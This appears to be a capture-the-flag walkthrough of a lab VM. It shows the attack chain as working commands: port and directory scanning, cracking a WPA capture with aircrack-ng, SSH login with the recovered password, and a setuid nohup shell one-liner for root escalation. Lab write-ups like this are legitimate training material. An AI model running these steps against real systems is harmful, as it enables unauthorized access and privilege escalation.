Netdiscover
1 | sudo netdiscover |
192.168.0.23
rustscan
1 | rustscan -a 192.168.0.23 |
Output:
Port 80
1 | gobuster dir -u http://192.168.0.23 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt |
Output:
http://192.168.0.23/robots.txt
On some pages I have this error:
In the htaccess file I have this message. I think it’s a joomla server.
http://192.168.0.23/htaccess.txt
1 | End - Joomla! core SEF Section. |
Port 9000
I can use gobuster on this page because he return the error 500 (Internal server error).
1 | gobuster dir -u http://192.168.0.23:9000 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt --wildcard switch |
Output:
But:
Nothing interesting.
Port 8999
It’s useless to run the gobuster scan on this web serveur because we already have the directories. It’s like an index of/ page.
It’s an webfs/1.21 server with a cap file.
I have to open it with wireshark.
WPA-01.cap
This is a capture of a wireless stream, with the SSID: dlink
I have to use aircrack-ng to find the password in the cap file with a directory attack.
1 | aircrack-ng -w Documents/wordlist/rockyou.txt /home/peanutstick/Downloads/WPA-01.cap |
The password for the SSID dlink is p4ssword.
SSH
I can use the user dlink to login via SSH.
1 | ssh [email protected] |
Enum
Can’t check the .bash_history.
With lse.sh:
There is nothing in /usr/bin/TryHarder!
Uncommon setuid
https://gtfobins.github.io/gtfobins/nohup/
I can’t use the commmand with sudo.
1 | /usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)" |
I’m root.
